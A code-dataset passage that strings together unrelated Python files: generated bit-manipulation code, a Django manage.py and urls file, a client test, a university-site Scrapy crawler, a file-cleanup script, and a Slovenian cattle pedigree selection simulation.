ref_35423 = (((ref_35421 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_35424 = (((ref_35421 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_35425 = (((ref_35421 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_35426 = ((ref_35421 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_36799 = ((((((((ref_35423) << 8 | ref_35424) << 8 | ref_35425) << 8 | ref_35426) << 8 | ref_34721) << 8 | ref_34722) << 8 | ref_34723) << 8 | ref_34724) # MOV operation
ref_37387 = ((((((((ref_5644) << 8 | ref_32099) << 8 | ref_29517) << 8 | ref_30211) << 8 | ref_5648) << 8 | ref_5649) << 8 | ref_5650) << 8 | ref_32793) # MOV operation
ref_37419 = ref_37387 # MOV operation
ref_37433 = (0x3F & ref_37419) # AND operation
ref_37470 = ref_37433 # MOV operation
ref_37484 = ((ref_37470 << (0x4 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_37521 = ref_36799 # MOV operation
ref_37533 = ref_37484 # MOV operation
ref_37535 = (ref_37533 | ref_37521) # OR operation
ref_37574 = ref_37535 # MOV operation
ref_39128 = ((((((((ref_26895) << 8 | ref_26896) << 8 | ref_26897) << 8 | ref_26898) << 8 | ref_27597) << 8 | ref_27598) << 8 | ref_27599) << 8 | ref_27600) # MOV operation
ref_39544 = ref_25063 # MOV operation
ref_39890 = ref_37574 # MOV operation
ref_39924 = ref_39890 # MOV operation
ref_39938 = (ref_39924 >> (0x3 & 0x3F)) # SHR operation
ref_40047 = ref_39938 # MOV operation
ref_40061 = (0xF & ref_40047) # AND operation
ref_40108 = ref_40061 # MOV operation
ref_40114 = (0x1 | ref_40108) # OR operation
ref_40151 = ref_39544 # MOV operation
ref_40163 = ref_40114 # MOV operation
ref_40165 = (ref_40151 >> ((ref_40163 & 0xFF) & 0x3F)) # SHR operation
ref_40494 = ref_37574 # MOV operation
ref_40528 = ref_40494 # MOV operation
ref_40542 = (ref_40528 >> (0x3 & 0x3F)) # SHR operation
ref_40651 = ref_40542 # MOV operation
ref_40665 = (0xF & ref_40651) # AND operation
ref_40712 = ref_40665 # MOV operation
ref_40718 = (0x1 | ref_40712) # OR operation
ref_40769 = ref_40718 # MOV operation
ref_40771 = ((0x40 - ref_40769) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_40779 = ref_40771 # MOV operation
ref_41159 = ref_25063 # MOV operation
ref_41183 = ref_41159 # MOV operation
ref_41187 = ref_40779 # MOV operation
ref_41189 = (ref_41187 & 0xFFFFFFFF) # MOV operation
ref_41191 = ((ref_41183 << ((ref_41189 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_41198 = ref_41191 # MOV operation
ref_41224 = ref_40165 # MOV operation
ref_41228 = ref_41198 # MOV operation
ref_41230 = (ref_41228 | ref_41224) # OR operation
ref_41359 = ref_41230 # MOV operation
ref_41373 = (0xF & ref_41359) # AND operation
ref_41410 = ref_41373 # MOV operation
ref_41424 = ((ref_41410 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_41461 = ref_39128 # MOV operation
ref_41473 = ref_41424 # MOV operation
ref_41475 = (ref_41473 | ref_41461) # OR operation
ref_41514 = ref_41475 # MOV operation
ref_42268 = ref_37574 # MOV operation
ref_42302 = ref_42268 # MOV operation
ref_42316 = (ref_42302 >> (0x3 & 0x3F)) # SHR operation
ref_42425 = ref_42316 # MOV operation
ref_42439 = (0x7 & ref_42425) # AND operation
ref_42486 = ref_42439 # MOV operation
ref_42492 = (0x1 | ref_42486) # OR operation
ref_42877 = ((((((((ref_5644) << 8 | ref_32099) << 8 | ref_29517) << 8 | ref_30211) << 8 | ref_5648) << 8 | ref_5649) << 8 | ref_5650) << 8 | ref_32793) # MOV operation
ref_42901 = ref_42877 # MOV operation
ref_42905 = ref_42492 # MOV operation
ref_42907 = (ref_42905 & 0xFFFFFFFF) # MOV operation
ref_42909 = ((ref_42901 << ((ref_42907 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_42916 = ref_42909 # MOV operation
ref_43276 = ref_41514 # MOV operation
ref_43656 = ref_25063 # MOV operation
ref_43672 = ref_43276 # MOV operation
ref_43684 = ref_43656 # MOV operation
ref_43686 = (ref_43684 | ref_43672) # OR operation
ref_43803 = ref_42916 # MOV operation
ref_43807 = ref_43686 # MOV operation
ref_43809 = (ref_43807 | ref_43803) # OR operation
ref_43848 = ref_43809 # MOV operation
ref_44075 = ref_43848 # MOV operation
ref_44077 = ref_44075 # MOV operation
print ref_44077 & 0xffffffffffffffff
| [
"jonathan.salwan@gmail.com"
] | jonathan.salwan@gmail.com |
321e2ecf857820a2d395f84898feed8eefd6e54e | 42abec8bc24b923dc18114d517bfc467505f0584 | /test | def69bbdfc6b1c9cc09c8bc3b213a73584b3bed6 | [] | no_license | TangYuOG/superTang | b422c00e5ccb52725c776a59f5fb0085559f2ee4 | 76001a717011637af5a81b1a6f1359c734bd4353 | refs/heads/master | 2020-04-04T18:17:13.121364 | 2018-11-05T02:46:20 | 2018-11-05T02:46:20 | 156,157,552 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 811 | #!/usr/bin/env python3
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangodemo02.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"tarena@tedu.cn"
] | tarena@tedu.cn | |
539f747aea7fe6c503a164283f17c23d2cc410ef | 7e9c3b7684a7c9d712382cb170ab2ca1485b5ea2 | /test/test_monty.py | ed1e6c94242cb103125420c1f68e9ec9b17fbb0c | [
"Apache-2.0"
] | permissive | hackerlist/monty-python | 0adabb857d6025b8004f406a10f59a533c3df464 | eb4233e2f0301665e3469401e71d8a54c4503311 | refs/heads/master | 2020-12-30T09:38:07.050584 | 2014-05-24T10:45:23 | 2014-05-24T10:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #-*- coding: utf-8 -*-
"""
montypy.test
~~~~~~~~~~~~
Test cases for monty-python
"""
import unittest
import os
from montypy import Monty
TEST_SRV = 'https://monty.criticalpha.se'
class TestMontyPy(unittest.TestCase):
def test_instantiation(self):
m = Monty(TEST_SRV)
def test_nodes(self):
m = Monty(TEST_SRV)
nodes = m.nodes()
def test_probes(self):
m = Monty(TEST_SRV)
probes = m.probes()
def test_scripts(self):
m = Monty(TEST_SRV)
scripts = m.scripts()
def test_results(self):
m = Monty(TEST_SRV)
results = m.results()
def test_status(self):
m = Monty(TEST_SRV)
statuses = m.status()
| [
"michael.karpeles@gmail.com"
] | michael.karpeles@gmail.com |
74c58f92a24f50e470b93242b98a5a0b06c6581c | 69f2b8f54d923a064bf0de20249b5aa619f1da12 | /example/example/common/urls.py | 6c7ab2725da62af487d78fe557a29dc7035f43b8 | [] | no_license | skibblenybbles/django-dojoforms | 8302dff51f571d35e2c1f8439487baf494cd655c | 75e7b7a1c05c7db64df56352bd9e697450da4dab | refs/heads/master | 2020-12-29T01:41:46.657653 | 2012-11-08T03:55:50 | 2012-11-08T03:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.conf.urls import patterns, include, url
urlpatterns = patterns("example.common.views",
url(r'^$', "pages.homepage_view", name="homepage"),
)
| [
"mkibbel@gmail.com"
] | mkibbel@gmail.com |
24f50ff549e8c93fb62458eeb8bef3690e2293e6 | 63707652ba98b136744efd61115b7da9decd64ea | /homework1/q3/q3/spiders/q3_spider.py | d299ef2b3f7cf3267c544659ea1f1b26beb153c8 | [] | no_license | yerihyo/cs6200f13 | ad79a576f8ad190ef9f35049df988e62310ed0db | 96c5161a1b767118ded5dee441140fe49c499251 | refs/heads/master | 2021-01-01T18:07:55.390969 | 2013-09-18T22:57:27 | 2013-09-18T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from q3.items import HyperlinkItem
import re
import urlparse
import sys
from scrapy.exceptions import CloseSpider
# from scrapy.contrib.closespider import CloseSpider
class MyExtractor(SgmlLinkExtractor):
seen_urls = {}
def __init__(self, allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(),
tags=('a', 'area'), attrs=('href'), canonicalize=True, unique=True, process_value=None,
deny_extensions=None, seen_urls=[]):
SgmlLinkExtractor.__init__(self,allow=allow, deny=deny, allow_domains=allow_domains, deny_domains=deny_domains, restrict_xpaths=restrict_xpaths,
tags=tags, attrs=attrs, canonicalize=canonicalize, unique=unique, process_value=process_value,
deny_extensions=deny_extensions)
for l in seen_urls: self.seen_urls[l]=True
def is_valid_link(self,l):
url = l.url
p = urlparse.urlparse(url)
if p.scheme != 'http': return False
if p.netloc != 'www.ccs.neu.edu': return False
# if p.netloc != 'www.northeastern.edu': return False
if url in self.seen_urls: return False
self.seen_urls[url] = True
return True
def extract_links(self, response):
links = SgmlLinkExtractor.extract_links(self, response) # python's old-style super
filtered_links = filter(self.is_valid_link, links)
return filtered_links
class CCSSpider(CrawlSpider):
name = "ccs.neu.edu"
start_urls = [
"http://www.ccs.neu.edu/",
# "file:///tmp/tt",
]
extractor = MyExtractor(seen_urls=[], tags=('a','area','link'), unique=False, deny_extensions=[])
count = 0
rules = (
Rule(extractor, callback="parse_page", follow=True),
)
def parse(self,response):
self.extractor.seen_urls[response.url]=True
for i in self.parse_page(response):
yield i
for r in CrawlSpider.parse(self,response):
yield r
def parse_page(self,response):
content_types = re.split('\s*;\s*',response.headers['Content-Type'])
url = response.url
if 'application/pdf' in content_types or 'text/html' in content_types:
yield HyperlinkItem(url=url)
self.count += 1
if self.count>100:
raise CloseSpider("Closing spider")
| [
"yerihyo@gmail.com"
] | yerihyo@gmail.com |
537b65a9a936c8cc8663d161026ab155e899d103 | e3dcfa127f8d1e03b25d9f38d1d93bea9926d3b5 | /weaver/devtools/devclean.py | 183a4076e3b3ab0df35d7611d31c1229f4ca3c85 | [
"MIT"
] | permissive | mikadosoftware/weaver | 72832ff66efb8e352523126865ba1a89ad881ab2 | 58d35b72714a9be78d4bf31d9072b243469f5ffc | refs/heads/master | 2022-12-11T11:01:19.545070 | 2018-09-21T18:36:11 | 2018-09-21T18:36:11 | 76,447,730 | 0 | 0 | MIT | 2022-12-08T00:39:26 | 2016-12-14T10:04:52 | Python | UTF-8 | Python | false | false | 1,535 | py | #!/bin/env python
"""devclean
Usage:
devclean <rootpath> [--show]
devclean (-h | --help)
devclean --version
Options:
-h --help Show this screen.
--version Show version.
--show Only show dont kill files
"""
import os, sys
from fnmatch import fnmatch
from docopt import docopt
crap_matcher = ['*.*~',
'*.pyc',
'#*#']
ignore_dirs = ['.git', '__pycache__']
def killfiles(kill_list,
flag=False):
'''
'''
for fn in kill_list:
if flag:
os.remove(fn)
print("[x] ", fn)
else:
print("[ ] ", fn)
def clean_tree(cwd=None,
killflag=False):
'''walk eveything below me, delete all the crap
'''
rdir = cwd or os.getcwd()
kill_list = []
for root, dirs, files in os.walk(rdir):
#do we have dirs to ignore in next depth??
for _dir in dirs:
if _dir in ignore_dirs:
dirs.remove(_dir)
# now for each file, remove the crap, use globbing
for file in files:
for pattern in crap_matcher:
if fnmatch(file, pattern):
kill_list.append(os.path.join(root, file))
killfiles(kill_list, killflag)
#entrypoint
def main():
""" """
args = docopt(__doc__)
killflag = bool(not args['--show'])
rootpath = args['<rootpath>']
clean_tree(cwd=rootpath,
killflag=killflag)
if __name__ == '__main__':
import doctest
doctest.testmod()
| [
"paul@mikadosoftware.com"
] | paul@mikadosoftware.com |
8972f111013667f386ff26b9e44f2e4d03ac2211 | 8c95c48d48a5a6a351de57d90b56eb6e2642914c | /Select_pedigree.py | 6facc3b4d61c02b8d21a1b0c0166f7b7ce1b4d30 | [
"curl",
"Apache-2.0"
] | permissive | janaobsteter/Genotype_CODES | e24dafcf00476a9e0cc989b3c822bd13a391f76f | 8adf70660ebff4dd106c666db02cdba8b8ce4f97 | refs/heads/master | 2021-08-09T14:50:50.721598 | 2021-01-27T14:23:16 | 2021-01-27T14:23:16 | 63,061,123 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 32,186 | py | # -*- coding: utf-8 -*-
from __future__ import division
import os
import sys
import shutil
from collections import defaultdict
import pandas as pd
import numpy as np
from collections import defaultdict
import random
from itertools import chain
from subprocess import call
from selection10 import *
#reload(selection)
#from selection import *
# -*- coding: utf-8 -*-
#############################################33
#tukaj naštimaj parametre
#1) odstotki živali v kateogorijah
#nT = 20000 # velikost populacije
#perF = 0.9
#perM = 0.1 # odstotki ženskih in moških živali v aktivni populaciji
#odstotki kategorij znotraj spola
stNB = 6700
nrF = stNB * 0.5
telF = 0.966
pt = 0.85 #koliko jih pride do telic
#kraveRemont = 0.25 # ali pa število laktacij
#TUKAJ ŠE; KOLIKO JIH PREŽIVI PRVO LAKTACIJO!
bm = 0.0127 #TO JE OD KRAV!!!
#sum([nrF, ptel, tel, pt24, t24, k])
nrM = stNB * 0.5
potomciNP = 0.0135 #%OD NOVOROJENIH
vhlevljeni = 0.6 #TO JE ODSTOTEK OD POTOMCEV NAČRNIH PARJENJ
mladi = 0.30 #TO JE ZNOTRAJ POTOMCEV NAČRTNIH PARJENJ
pripust = 0.70 # to je znotraj vhlevljenih
#pripust = 0.0135 #TO JE ZNOTRAJ BIKOV 12!!!!
telM = 0.73 #KOLIKO BIKOV postane moška teleta
#cakajoci = 0.018 #to je znotraj bikov12!!!!!
bik12 = 0.12 #koliko bikov do 12 mesecev preživi še do 2. leta
pb = 0.5 #KOLIKO OD MLADIH POSTANE TESTIRANIH
#nrM + bik12 + bik24
#2)števila let v uporabi
kraveUp = 4 #povprečno koliko let so krave v populaciji (koliko laktacij) = remont krav
bmUp = 3 # koliko let so v uporabi BM - REMONT!
cak = 3 #koliko časa so mladi biki v testu oz. koliko časa so čakajoči
pbUp = 5 #koliko let so povrpečno v uporabi biki v AI
pripustUp = 1.4 # koliko let so v uporabi biki v pripustu
genomUp = 1.3 #koliko let so povprečno v uporabi genomsko testirani biki
bmOdbira = 2
##številke doz letno
pripustDoz = 15
pozitivnoTestDoz = 220
mladiDoz = 250
##################################################################################################################3
##################################################################################################################3
#od tu naprej samo delo s parametri = spremenvljivkami
##################################################################################################################3
#številke
#ženske
nrFn = int(stNB * 0.5)
telFn = int(telF * nrFn)
ptn = int(pt* telFn)
bmn = int(round(ptn * kraveUp *bm)) #to je od vseh krav
#kn = int(k * nF)
#bmn = int(bm * k * nF)
#sum([nrFn, pteln, teln, pt24n, t24n, kn])
nM = 0.5
nrMn = int(round(stNB * 0.5 * (1 - potomciNP)))
telMn = int(round(telM * nrMn))
bik12n = int(round(bik12 * telMn))
potomciNPn = int(round(potomciNP * nrMn))
vhlevljenin = int(round(potomciNPn * vhlevljeni))
mladin = int(round(mladi * vhlevljenin)) ###Mladi: mladin = int(nrM * nM * mladi)
#cakajocin = int(cakajoci* nM)
pripustTn = int(round((vhlevljenin - mladin)*pripustUp))
pripust1n = vhlevljenin - mladin
pripust2n = pripustTn - pripust1n
pbn = int(pb * mladin)
#sum([nrMn, bik12n, bik24n, cakajocin, pripustn, pbn, mladin])
#sum([nrMn, bik12n, bik24n])
##########################################################
#ženske
#odberi novorojene
#tu se ne rabiš obremenjevat s tem, katere so matere in kateri očetje - to narediš na koncu, ko konstruiraš novorojene za naslednjo gene
#ti novorojeni so že prva generacija
#na koncu potegni skupaj ID in kategorije ter to uporabi za določitev staršev#
#tudi šele tam se ukvarjaj z [pb]
import selection
reload(selection)
from selection import *
##############################################################################################3
##############################################################################################3
##############################################################################################3
#VEDNO NAJPREJ IZLOČI /ODBERI PO PV!!! - funckije za odbiro na random imajo pogoj, da je kateogrija prosta
def select_age_0_1(ped, categories): #tukaj odbereš iz novorojenih živali tel, ptel in mlade bike, pripust1
#FEMALES
ped.set_cat_sex_old("F", "potomciNP", "telF", categories)
izlF = nrFn - telFn#koliko jih izločiš
ped.izloci_poEBV("F", izlF, "nr", categories) #tukaj jih izloči, funkcija v modulu
ped.izberi_poEBV_top("F", (nrFn - izlF), "nr", "telF", categories) #izberi telice, ki jih osemeniš --> krave
#MALES
ped.izberi_poEBV_top( "M", vhlevljenin, "potomciNP", "vhlevljeni", categories) #odberi mlade TO SAMO NA ZAČETKU; POTEM POTOMCI BM IN ELITE!
ped.izloci_poEBV("M", int(potomciNPn - vhlevljenin), 'potomciNP', categories)
ped.izberi_random("M", telMn, "nr", "telM", categories)
ped.izloci_random("M", int(nrMn - telMn), "nr", categories)
def select_age_1_2(ped, categories): # tukaj odbereš nič pri kravah - razen, če so že bikovske matere, pripust 2, bike24
#FEMALES
ped.izberi_poEBV_top("F", ptn, 'telF', 'pt', categories)
ped.izloci_poEBV("F", (len(categories['telF']) - ptn), 'telF', categories) #terlice postanejo
#MALES
ped.izberi_poEBV_top( "M", mladin, "vhlevljeni", "mladi", categories) #odberi mlade
ped.izberi_poEBV_OdDo( "M", mladin, vhlevljenin, "vhlevljeni", "pripust1", categories) #odberi v pripustu
ped.izberi_random( "M", bik12n, 'telM', 'bik12', categories)
ped.izloci_random( "M", (len(categories['telM']) - bik12n), 'telM', categories)
#tukaj lahk daš vse v eno funkcijo - variabilno - koliko let krave, koliko let v testu
def select_age_2_3(ped, categories):
#FEMALES
#najprej dodaj nove krave
ped.set_cat_old('pt', 'k', categories) #osemenjene telice postanejo krave - predpostavimo, da vse
#potem izloči najstarejše krave - po 4. laktaciji
if ('k' in categories.keys()) and ((kraveUp+2) in ped.age()): #izloči koliko laktacij + 2 leti
ped.izloci_age_cat((kraveUp+2), 'k', categories)
#ostale krave prestavi naprej v krave - OZIROMA PODALJŠAJ STATUS!
ped.set_cat_age_old(3, 'k', 'k', categories)
ped.set_cat_age_old(4, 'k', 'k', categories)
ped.set_cat_age_old(5, 'k', 'k', categories)
#če imaš že dovolj stare krave, potem odberi BM
#BM se odbira po drugi laktaciji - to je starost 3 - 4 (starost v pedigreju = 3, ker imaš tudi 0)
if ('k' in categories.keys()) and ((1 + bmOdbira) in ped.age()):
ped.izberi_poEBV_top_age("F",3, int(bmn /bmUp), 'k', 'pBM', categories) #izberi bikovske matere
#in izloči najastarejše BM, če jih imaš
if ('bm' in categories.keys()):
ped.izloci_cat('bm', categories)
#ostale BM prestavi naprej
for i in range((1 + bmOdbira + 1), (1 + bmOdbira + bmUp)): #1 leto prva osemenitev, bm odbrane po 2. laktaciji, +1 da začneš prestavljat
ped.set_cat_age_old(i, 'pBM', 'pBM', categories)
ped.set_cat_age_old((1 + bmOdbira + bmUp), 'pBM', 'bm', categories) #spremeni kategorijo iz plemenskih BM v bm v zadnji laktaciji
#MALES
#mladi biki postanejo čakajoči (~1 leto, da se osemeni krave s semenom oz. malo po 2. letu)
ped.set_cat_old('mladi', 'cak', categories)
ped.set_active_cat('mladi', 2, categories)
#čakajočim bikov podaljšaj status (do starosti 5 let)
#hkrati jim tudi nastavi status izl
#ped.set_cat_age_old(2, 'cak', 'cak', categories)
for i in range((2 + 1), (2 + cak)): #1 leto, ko začnejo semenit in so mladi biki, 3 so čakajoči, +1 da začneš prestavlajt
ped.set_cat_age_old(i, 'cak', 'cak', categories)
#povprečna doba v pripustu - glede na to odberi bike, ki preživijo še eno leto
if 'pripust1' in categories.keys():
ped.izberi_random( "M", pripust2n, 'pripust1', 'pripust2', categories)
ped.izloci_random( "M", (pripust1n - pripust2n), 'pripust1', categories)
#plemenske bike prestavljaj naprej
ped.set_cat_old('pb', 'pb', categories)
ped.izloci_cat('bik12', categories)
ped.izloci_cat('pripust2', categories)
if ('cak' in categories.keys()) and ((cak+2) in ped.age()): #+2 - eno leto so teleta, eno leto mladi biki
ped.izberi_poEBV_top_age("M", (cak +2), int(mladin * 0.5), 'cak', 'pb', categories)
ped.set_active_cat('cak', 2, categories) #tukaj moraš to nastaviti, zato ker fja izberi avtomatsko nastavi na active=1
ped.izloci_poEBV_age("M",(cak+2), int(mladin * 0.5), 'cak', categories) #TUKAJ MORA BITI ŠE STAROST!!!!!!!!!!!
def doloci_matere(ped):
#MATERE
sTbmMother = 90 if len(ped.catCurrent_indiv('pBM')) >= 90 else len(ped.catCurrent_indiv('pBM'))
if sTbmMother != 0:
bmMother = ped.select_mother_random('pBM', sTbmMother)
ped.set_mother_catPotomca(bmMother, 'potomciNP')
#
if 'k' in ped.cat():#TUKAJ SO DOLOČENE SEDAJ VSE MATERE!!!
mother = ped.select_mother_EBV_top('k', int(round(11000*0.7))) #tukaj odberi brez tistih, ki so za gospodarsko križanje
if len(mother) >= (stNB - sTbmMother): # če že imaš dovolj krav, določi matere vsem novorojenim oz. odbiraš matere, saj jih imaš preveč!
motherOther = random.sample(mother, (stNB - sTbmMother))
ped.set_mother_catPotomca(motherOther, 'nr') #TUKAJ SO DOLOČENE SEDAJ VSE MATERE!!!
elif len(mother) < (stNB - sTbmMother): # če jih še ni dovolj, ne odbiraš mater, ampak uporabiš vse MINUS gosp. križanmja
ped.set_mother_catPotomca(mother, 'nr')
def doloci_ocete(ped):
#OČETJE
mladiOce = ped.catCurrent_indiv('mladi')
pripustOce = ped.catCurrent_indiv('pripust1') + ped.catCurrent_indiv('pripust2')
testiraniOce = list(chain.from_iterable([ped.catCurrent_indiv_age('pb', (2 + cak + x)) for x in range(1, pbUp+1)])) # v času, ko določaš potomce, so že eno leto starjši!!!
bmMother = 90 if len(ped.catCurrent_indiv('pBM')) >= 90 else len(ped.catCurrent_indiv('pBM'))
if 'pb' in ped.cat():
elita = np.random.choice(ped.catCurrent_indiv('pb'), bmMother, replace=True) #navidezna elita
# pd.Series(elita).value_counts()#preveri zastopanost po bikih
#naštimaj očete elite --> BM
ped.set_father_catPotomca(elita, 'potomciNP')
ocetje = pripustOce*pripustDoz + testiraniOce*pozitivnoTestDoz + mladiOce*mladiDoz
if len(ocetje) >= (stNB - potomciNPn*2): #če imaš dovolj DOZ za vse NB
ocetjeNB = random.sample(ocetje, (stNB - potomciNPn*2)) #tukaj izbereš očete za vse krave - razen BM!
ped.set_father_catPotomca(ocetjeNB, 'nr')
if len(ocetje) < (stNB - potomciNPn*2):
ped.set_father_catPotomca(ocetje, 'nr')
#####################################################################
#tukaj je zdj funkcija, ki vse to dela!
#####################################################################
#to je funkcija za odbiro in določanje staršev
#prvi pogoj if max gen = 1 je za primer, ko štartaš s praznim naivnim pedigrejem brez staršev - mam in očetov ni v pedigreju
#drugi pogoj,ko dodaš generacijo novorojenih in pelješ prejšnjo generacijo naprej
#tretji krog so združene vse selekcijske odločitve po tem - počasi dobiš bm in pb, če jih ni, se pač ti starši ne določajo
def selekcija_ena_gen(pedFile, categories = None, sex = None, active = None):
ped = pedigree(pedFile)
if max(ped.gen) == 1:
ped.set_cat_gen(max(ped.gen), "nr") # to je samo na prvem loopu
ped.set_sex_list([x for x in range(0, ped.rows()) if x % 2 == 0], "F")
ped.set_sex_list([x for x in range(0, ped.rows()) if x % 2 != 0], "M")
ped.izberi_poEBV_top_catCurrent("F", int(potomciNPn), 'nr', 'potomciNP')
ped.izberi_poEBV_top_catCurrent("M", int(potomciNPn), 'nr', 'potomciNP')
#global categories #to moraš dat global samo v prvenm loopu, drugje dobiš return
categories = ped.save_cat()
#global sex
sex = ped.save_sex()
ped = pedigree(pedFile)
ped.set_sex_prevGen(sex)# prva odbira
ped.compute_age()
select_age_0_1(ped, categories)
ped.add_new_gen_naive(stNB, potomciNPn*2)
ped.compute_age()
#dodaj matere
doloci_matere(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
#dodaj očete
doloci_ocete(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
categories.clear()
if max(ped.gen) == 2:
# SETSEX!!!
ped.set_sex_prevGen(sex)
ped.set_active_prevGen(active)
# druga odbira
ped.set_cat_gen(1, "")
ped.set_cat_gen(2, "")
ped.set_cat_old('izl', 'izl', categories)
ped.compute_age()
select_age_0_1(ped, categories)
select_age_1_2(ped, categories)
ped.add_new_gen_naive(stNB, potomciNPn*2)
ped.compute_age()
#dodaj matere
doloci_matere(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
#dodaj očete
doloci_ocete(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
categories.clear() #sprazni slovar od prejšnjega leta
#dodaj starše novorojenim - VEDNO PRVO MAME, KER JE FUNKCIJA ZA OČETE NAŠTIMANA, DA SE RAVNA PO MAMAH!
if max(ped.gen) >= 3:
ped.set_sex_prevGen(sex)
ped.set_active_prevGen(active)
for i in ped.gens():
ped.set_cat_gen(i, "")
ped.set_cat_old('izl', 'izl', categories)
ped.compute_age()
select_age_0_1(ped, categories)
select_age_1_2(ped, categories)
select_age_2_3(ped, categories)
ped.add_new_gen_naive(stNB, potomciNPn*2)
ped.compute_age()
#dodaj matere
doloci_matere(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
#dodaj očete
doloci_ocete(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
categories.clear() #sprazni slovar od prejšnjega leta
ped.write_ped("/home/jana/bin/AlphaSim1.05Linux/ExternalPedigree.txt")
return ped, ped.save_cat(), ped.save_sex(), ped.save_active()
#######################################################
#TO JE, ČE ŠTARTAŠ S POLNO AKTIVNO POPULACIJO IN DOLOČIŠ KATEGORIJE
#######################################################
def nastavi_cat(PedFile):
ped = pedigree(PedFile)
ped.compute_age()
#MALES FIRST
#age 0
#določi vhlevljene
ped.izberi_poEBV_top_age_naive(0, vhlevljenin, 'vhlevljeni')
#določi moška teleta pod 12
ped.izberi_random_age_naive(0, telMn, 'telM')
#age1
#določi mlade
ped.izberi_poEBV_top_age_naive(1, mladin, 'mladi')
#določi pripust - 1. leto
ped.izberi_poEBV_OdDo_age_naive(1, mladin, vhlevljenin, 'pripust1')
#določi bike nad 12 m
ped.izberi_random_age_naive(1, bik12n, 'bik12')
#age2
ped.izberi_poEBV_top_age_naive(2, mladin, 'cak')
ped.izberi_poEBV_OdDo_age_naive(1, mladin, (mladin + pripust2n), 'pripust2')
#age3,4
for i in [3,4]:
ped.izberi_poEBV_top_age_naive(i, mladin, 'cak')
#age 5 - 10: pb
pbAge = range((2 + cak), (2 + cak + pbUp)) if (2 + cak + pbUp) <= max(ped.gens()) else range((2 + cak), max(ped.gens()))
for i in pbAge:
ped.izberi_poEBV_top_age_naive(i, 4, 'pb')
#FEMALES
#age 0
#določi ženska teleta pod 12
ped.izberi_poEBV_top_age_naive(0, telFn, 'telF')
#age1
#določi plemenske telice
ped.izberi_poEBV_top_age_naive(1, ptn, 'pt')
#age2
for i in range(2, (1 + bmOdbira)):
ped.izberi_poEBV_top_age_naive(i, ptn, 'k')
#age3,4,5
#odberi plemenske bm najprej
for i in range((1 + bmOdbira), (1 + bmOdbira + bmUp)):
ped.izberi_poEBV_top_age_naive(i, int(bmn / bmUp), 'pBM')
ped.izberi_poEBV_top_age_naive(i, (ptn - int(bmn / bmUp)), 'k')
#age 6
#izberi odslužene bm
ped.izberi_poEBV_top_age_naive((1 + bmOdbira + bmUp), int(bmn / bmUp), 'bm')
#ostali so izločeni
#določi spol ženskim živalim
ped.set_sex_list(ped.row_cat('telF'), "F")
ped.set_sex_list(ped.row_cat('pt'), "F")
ped.set_sex_list(ped.row_cat('k'), "F")
ped.set_sex_list(ped.row_cat('pBM'), "F")
ped.set_sex_list(ped.row_cat('bm'), "F")
#določi spol moškim živalim
ped.set_sex_list(ped.row_cat('vhlevljeni'), "M")
ped.set_sex_list(ped.row_cat('telM'), "M")
ped.set_sex_list(ped.row_cat('bik12'), "M")
ped.set_sex_list(ped.row_cat('mladi'), "M")
ped.set_sex_list(ped.row_cat('cak'), "M")
ped.set_sex_list(ped.row_cat('pb'), "M")
ped.set_sex_list(ped.row_cat('pripust1'), "M")
ped.set_sex_list(ped.row_cat('pripust2'), "M")
#določi še izločene
ped.set_cat_list(ped.row_cat(""), 'izl')
ped.add_new_gen_naive(stNB, potomciNPn*2)
ped.compute_age()
#dodaj matere
doloci_matere(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
#dodaj očete
doloci_ocete(ped)
#preveri - mora biti nič!!! - oz. če mater še ni dovolj, potem še ne!
ped.mother_nr_blank()
ped.write_ped("/home/jana/bin/AlphaSim1.05Linux/ExternalPedigree.txt")
return ped, ped.save_cat(), ped.save_sex(), ped.save_active()
###########################################################################
########################################################################
#ped = pedigree("~/Documents/PhD/Simulaton/Pedigrees/PedPython.txt")
#TUKAJ PA JE SEDAJ PROGRAM
#Najprej določi, ali štartaš od začetka in počasi polniš populacijo ali štartaš z polnim pedigrejem
OPTION = raw_input("1 - Polnjenje populacije; 2 - Start z polnim pedigrejem ")
#PedFile = raw_input("Vnesi pot do pedigreja")
StBurnInGen = input("Vnesi stevilo burn in generacij: ")
StSelGen = input("Vnesi stevilo krogov oz. generacij: ")
AlphaSimDir = '/home/jana/bin/AlphaSim1.05Linux'
